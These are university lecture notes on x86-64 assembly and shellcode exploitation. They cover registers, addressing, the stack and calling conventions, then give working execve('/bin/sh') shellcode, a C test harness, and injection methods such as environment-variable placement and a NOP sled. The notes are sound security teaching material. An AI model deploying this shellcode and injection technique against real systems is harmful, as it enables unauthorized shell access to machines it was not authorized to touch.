lectures.alex.balgavy.eu

Lecture notes from university.

+++
title = "Lecture 6: assembly, shellcode exploits"
+++
# Lecture 6: assembly, shellcode exploits

## Assembly
We use x86-64 assembly in AT&T notation (personal note: Intel notation is nicer to work with, though).
- operand order: source, destination (Intel has the opposite)
- operands carry prefixes: `%` for registers, `$` for immediates (Intel doesn't have those)
- `#` for comments (Intel uses `;`)
- mnemonic suffix specifies operand size: b for byte, w for word (16 bits), l for long (32 bits), q for quad (64 bits) (Intel doesn't do this)
    - optional if one of the operands is a register

Assembly is a low-level, processor-specific symbolic language that is translated directly to machine code.

Instructions: simple operations like `mov %rax, %rbx` (copies the value from register rax to register rbx)
- form: `mnemonic source, destination` (the mnemonic is a short code telling the CPU what to do)
- number and type of operands depend on the instruction, and operands may be implicit
- operand types:
    - register: `%rax`, `%rsp`, or `%al`
        - storage locations on the CPU itself
        - types:
            - general purpose (to some extent): `%rax`, `%rbx`, `%rcx`, `%rdx`, `%rsi`, `%rdi`, `%r8`-`%r15`
            - stack pointer: `%rsp`
            - frame/base pointer: `%rbp`
            - flags register
            - instruction pointer: `%rip`
            - segment registers: `%cs`, `%ds`, `%es`, `%fs`, etc.
            - system registers, model-specific registers
            - registers added by instruction set extensions
        - registers are 64-bit by default, but smaller parts can be used: `%eax` (low 32 bits), `%ax` (low 16 bits), `%ah` (high 8 bits of `%ax`), `%al` (low 8 bits of `%ax`)
    - memory: `0x401000`, `8(%rbp)`, `(%rdx, %rcx, 4)`
        - at most one explicit memory operand per instruction
        - accessed by dereferencing pointers
        - specified as `offset(base, index, scale)`
            - computes and dereferences `offset+base+index*scale`
            - `base`, `index`: 64-bit registers
                - if `base` is `%rip`, a symbolic displacement is relative to the next instruction
            - `offset`: 32-bit constant or symbol, default 0
            - `scale`: 1, 2, 4, or 8 (default 1)
            - all parts optional
    - constants/immediates: prefixed with `$` (e.g. `$42`)
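
The address computation for a memory operand can be sketched in C. This is only a model of the arithmetic, and `effective_address` is a hypothetical helper name, not something the assembler or CPU exposes.

```c
#include <stdint.h>

/* Hypothetical helper: models how offset(base, index, scale) becomes an address.
 * The caller is assumed to pass a valid scale (1, 2, 4, or 8). */
uint64_t effective_address(int32_t offset, uint64_t base,
                           uint64_t index, uint8_t scale)
{
    /* The 32-bit offset is sign-extended to 64 bits before the addition.
     * Unsigned arithmetic wraps modulo 2^64, like the address calculation. */
    return base + index * (uint64_t)scale + (uint64_t)(int64_t)offset;
}
```

For example, `8(%rbp)` with `%rbp` holding `0x1000` corresponds to `effective_address(8, 0x1000, 0, 1)`, which yields `0x1008`.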

Directives: commands for the assembler
- `.data`: section with variables
- `.text`: section with code
- `.byte`/`.word`/`.long`/`.quad`: emits an integer (8/16/32/64 bits)
- `.ascii`/`.asciz`: emits a string (without/with null terminator)

Labels: create a symbol at the current address (`foo: .byte 42` is similar to a global `char foo = 42;` in C)

Comments: prefixed with `#`

Endianness: the order in which the bytes of an integer are stored in memory
- little endian: least significant byte first (used by x86)
- big endian: most significant byte first
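
A small C sketch of the two byte orders, assuming a 32-bit integer; the helper names `byte_at_le` and `byte_at_be` are made up for illustration. Each returns the byte that would sit at a given memory offset (0 to 3) under that byte order.

```c
#include <stdint.h>

/* Byte found at memory offset 0..3 when value is stored little endian:
 * offset 0 holds the least significant byte. */
uint8_t byte_at_le(uint32_t value, unsigned offset)
{
    return (uint8_t)(value >> (8 * offset));
}

/* Byte found at memory offset 0..3 when value is stored big endian:
 * offset 0 holds the most significant byte. */
uint8_t byte_at_be(uint32_t value, unsigned offset)
{
    return (uint8_t)(value >> (8 * (3 - offset)));
}
```

So `0x11223344` is laid out as `44 33 22 11` in little endian and as `11 22 33 44` in big endian.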

Signed integers:
- x86 stores signed ints in two's complement (the most significant bit has negative weight)
- to flip the sign, flip all bits and add 1
- most operations are identical for signed and unsigned values, except:
    - comparisons need different condition codes
    - multiplication and division use different instructions
- casting a signed integer to a larger size uses sign extension (the most significant bit is copied into all new bits)
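
Both rules can be tried out on raw bit patterns in C. This is a minimal sketch with hypothetical helper names; unsigned types are used so that the bit manipulation is well defined.

```c
#include <stdint.h>

/* Flip the sign: flip all bits and add 1. */
uint64_t negate(uint64_t x)
{
    return ~x + 1;
}

/* Sign-extend an 8-bit value to 64 bits:
 * copy bit 7 into all of the new bits 8..63. */
uint64_t sign_extend8(uint8_t x)
{
    uint64_t wide = x;
    if (x & 0x80)
        wide |= ~(uint64_t)0xff;
    return wide;
}
```

`negate(1)` gives the all-ones pattern, which is -1 in two's complement, and `sign_extend8(0xfe)` (which is -2 as a byte) gives `0xfffffffffffffffe` (still -2 as a quad).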

Common instructions:

| example | meaning |
|---|---|
| mov src, dst | dst = src |
| xchg dst1, dst2 | swap dst1 and dst2 |
| push src | store src on top of stack |
| pop dst | remove value from top of stack and store in dst |
| add src, dst | dst += src |
| sub src, dst | dst -= src |
| inc dst | dst += 1 |
| dec dst | dst -= 1 |
| neg dst | dst = -dst |
| cmp src1, src2 | set flags based on src2-src1 |
| and src, dst | dst &= src |
| or src, dst | dst \|= src |
| xor src, dst | dst ^= src |
| not dst | dst = ~dst |
| test src1, src2 | set flags based on src1 & src2 |
| jmp addr | jump to addr |
| call addr | push return address, jump to function at addr |
| ret | pop return address, return there |
| syscall | enter kernel to perform system call (based on registers) |
| lea src, dst | dst = &src (src must be a memory operand) |
| nop | do nothing |
Conditional branching instructions (prepend 'n' to the condition for the opposite, e.g. `jne`). `dst` and `src` refer to a preceding `cmp src, dst`; "result" is the result of the preceding flag-setting instruction.

| example | meaning |
|---|---|
| je addr; jz addr | jump if result == 0 |
| jb addr | jump if dst < src (unsigned) |
| ja addr | jump if dst > src (unsigned) |
| jl addr | jump if dst < src (signed) |
| jg addr | jump if dst > src (signed) |
| js addr | jump if result < 0 (signed) |
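
To see why signed and unsigned comparisons need different condition codes, here is a C model of the flags that `cmp` sets and the conditions the jumps test. It is a simplified sketch: the struct and function names are hypothetical, and only four flags are modelled.

```c
#include <stdint.h>
#include <stdbool.h>

struct flags { bool zf, cf, sf, of; };

/* Models `cmp src, dst` (AT&T order): flags describe dst - src. */
struct flags cmp_flags(uint64_t src, uint64_t dst)
{
    uint64_t result = dst - src;
    struct flags f;
    f.zf = (result == 0);                                /* zero flag */
    f.cf = (dst < src);                                  /* carry: unsigned borrow */
    f.sf = (result >> 63) != 0;                          /* sign bit of the result */
    f.of = (((dst ^ src) & (dst ^ result)) >> 63) != 0;  /* signed overflow */
    return f;
}

/* Conditions tested by the jumps in the table above. */
bool takes_jb(struct flags f) { return f.cf; }
bool takes_ja(struct flags f) { return !f.cf && !f.zf; }
bool takes_jl(struct flags f) { return f.sf != f.of; }
bool takes_jg(struct flags f) { return !f.zf && f.sf == f.of; }
```

With `dst` set to the all-ones pattern and `src` set to 1, both `ja` and `jl` are taken: the same bits are the largest unsigned value but -1 when read as signed.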

Stack:
- top of stack identified by stack pointer `%rsp`
- entries on the stack are always 64 bits
- push and pop implicitly store to/load from the address in `%rsp`
- stack grows downwards (push decrements `%rsp` by 8, pop increments `%rsp` by 8)
- call and ret push/pop the return address
- a function sets up its stack frame in the prologue and restores the caller's stack frame in the epilogue (but note: this depends on the calling convention)
- small parameters are passed in registers (`%rdi`, `%rsi`, `%rdx`, `%rcx`, `%r8`, `%r9`), other parameters on the stack, right-to-left (but note: this depends on the calling convention)
- function prologue:
    1. push `%rbp`
    2. set `%rbp` to `%rsp`
    3. push callee-saved registers that the function uses (`%rbx`, `%r12`-`%r15`)
    4. decrement `%rsp` to make space for local vars
    5. save parameters to local variables if needed
- function epilogue:
    1. save return value (if any) in `%rax`
    2. move `%rsp` back up past the local variables, so that it points at the saved registers
    3. pop callee-saved registers (in reverse order of the pushes)
    4. pop `%rbp`
    5. return to caller (uses top-of-stack as return address)
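
The effect of push and pop on `%rsp` can be modelled with a toy stack in C. This is a sketch under simplifying assumptions: the "memory" holds only the stack, `rsp` is a byte offset into it rather than a real address, and there is no overflow checking. All names are hypothetical.

```c
#include <stdint.h>

#define STACK_SLOTS 64

struct machine {
    uint64_t mem[STACK_SLOTS];  /* toy memory that holds only the stack */
    uint64_t rsp;               /* byte offset into mem, starts at the top */
};

void machine_init(struct machine *m)
{
    m->rsp = sizeof m->mem;     /* empty stack: rsp just past the highest slot */
}

void stack_push(struct machine *m, uint64_t value)
{
    m->rsp -= 8;                /* stack grows downwards */
    m->mem[m->rsp / 8] = value; /* store at the new top of stack */
}

uint64_t stack_pop(struct machine *m)
{
    uint64_t value = m->mem[m->rsp / 8]; /* load from top of stack */
    m->rsp += 8;
    return value;
}
```

In this model, `call` would be a `stack_push` of the return address followed by a jump, and `ret` a `stack_pop` into the instruction pointer.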

## Shellcode
Assume we:
- found a vulnerability that allows overwriting a return address
- crafted input to trigger the vulnerability

Where do we point the return address?
- code that's already in the program
- code that we inject into the program

x86 CPUs don't distinguish code and data, so if memory permissions allow:
- we can read/write program code as data
- we can execute data as program code

How do we inject code into the program?
- specify as parameter
- specify as environment variable
- provide as input (if input is stored in a buffer)

Injected code must:
- work regardless of where it's stored in memory
- not depend on external code like libraries
- not contain any null bytes (a null byte would cut the payload short if it is copied as a string)
- do something that gives the attacker control of the system
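
The null-byte requirement is easy to check mechanically. A minimal sketch, with a hypothetical helper that scans an assembled payload for the first zero byte:

```c
#include <stddef.h>

/* Returns the index of the first zero byte in the payload, or -1 if there is none. */
long first_null_byte(const unsigned char *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return (long)i;
    return -1;
}
```

For instance, `movl $0x3b, %eax` assembles to `b8 3b 00 00 00`, which fails the check because the 32-bit immediate contains zero bytes, while `xorl %eax, %eax` followed by `movb $0x3b, %al` assembles to `31 c0 b0 3b`, which passes.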

User code can't start a program itself; the kernel does that.
So tell the kernel to do something using a syscall:
- special instruction to switch to the kernel
- based on params stored in registers or memory, the kernel performs the required task
- kernel returns to our program

Starting a shell:
- need the execve system call to start a program (the shell)
- want to call `execve("/bin/sh", argv, NULL)`, where `char *argv[] = { "/bin/sh", NULL }`
- how without shared libraries (libc)?
    - `%rax` register stores which system call to invoke, `0x3b` is `execve`
    - `syscall` switches to the kernel, result is stored in `%rax` after return
    - `retq` returns to the caller
- so shellcode requirements are:
    - string "/bin/sh" in memory
    - array in memory, with pointer to "/bin/sh" and NULL pointer
    - pointer to string in `%rdi` (program name)
    - pointer to array in `%rsi` (`argv`)
    - NULL pointer in `%rdx` (`envp`)

Shellcode:

```asm
.data
.globl shellcode
shellcode:
    jmp code_start
string_addr:
    .ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
    leaq string_addr(%rip), %rdi    # load address of the string into %rdi ('path' in execve), offset is negative to avoid null bytes
    xorl %eax, %eax                 # clear %rax without using null bytes
    movb %al, 0x07(%rdi)            # replace "N" in string with null, use %al to avoid explicit null
    movq %rdi, 0x08(%rdi)           # store pointer to program name in argv[0] (overwrites the "A"s)
    movq %rax, 0x10(%rdi)           # store null in argv[1] (overwrites the "B"s), use %rax to avoid explicit null
    leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    movb $0x3b, %al                 # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
    syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    .byte 0
```
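
The three stores in the shellcode turn the 24-byte placeholder string into the data that execve needs. The following C sketch mirrors those stores on an ordinary buffer. It assumes 64-bit pointers, and `patch_execve_buffer` is a hypothetical name used only for illustration.

```c
#include <stdint.h>
#include <string.h>

/* buf initially holds the 24 bytes "/bin/shNAAAAAAAABBBBBBBB".
 * Afterwards: bytes 0..7 are the string "/bin/sh" with its terminator,
 * bytes 8..15 are argv[0] (pointer to the string), bytes 16..23 are argv[1] (NULL). */
void patch_execve_buffer(unsigned char buf[24])
{
    uint64_t path = (uint64_t)(uintptr_t)buf;  /* plays the role of %rdi */
    uint64_t null = 0;                         /* plays the role of %rax */

    buf[7] = 0;                                /* movb %al, 0x07(%rdi) */
    memcpy(buf + 8, &path, sizeof path);       /* movq %rdi, 0x08(%rdi) */
    memcpy(buf + 16, &null, sizeof null);      /* movq %rax, 0x10(%rdi) */
}
```

After the call, `buf` itself is the `path` argument and `buf + 8` is the `argv` argument, matching what the shellcode places in `%rdi` and `%rsi`.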

Testing shellcode:

```c
#include <stdio.h>

int main(int argc, char **argv) {
    extern char shellcode;
    void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    f();
    fprintf(stderr, "this shouldn't print\n");
    return -1;
}
```

Injecting the shellcode:
- assume injection in an environment variable
    - injection in a command line argument is similar
    - injection in input data is harder, but similar techniques apply (create and analyze a program similar to the vulnerable program)
    - one solution is a NOP sled: jumping anywhere into a sequence of NOPs ends up at the first instruction after it
- if we specify the shellcode as an env variable, we can compute its address (`bottom_of_stack-8-(strlen(progname)+1)-(strlen(shellcode)+1)`)
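
The address formula and the NOP sled can both be written down in a few lines of C. This is a sketch with hypothetical helper names. `bottom_of_stack` is an assumed input: it has to be determined for the target system and is only predictable when stack address randomization is off.

```c
#include <stdint.h>
#include <string.h>

/* Address of the shellcode string in the environment, following the formula above. */
uint64_t env_shellcode_address(uint64_t bottom_of_stack,
                               const char *progname,
                               const char *shellcode)
{
    return bottom_of_stack - 8
         - (strlen(progname) + 1)
         - (strlen(shellcode) + 1);
}

/* Fills out[0..out_len) with a NOP sled followed by the code.
 * Returns the sled length, or 0 if the code does not fit. */
size_t build_sled(unsigned char *out, size_t out_len,
                  const unsigned char *code, size_t code_len)
{
    if (code_len > out_len)
        return 0;
    size_t sled_len = out_len - code_len;
    memset(out, 0x90, sled_len);             /* 0x90 is the one-byte x86 NOP */
    memcpy(out + sled_len, code, code_len);  /* real code starts right after the sled */
    return sled_len;
}
```

With a sled in front of the code, the overwritten return address only has to land somewhere inside the first `sled_len` bytes rather than on the exact start of the shellcode.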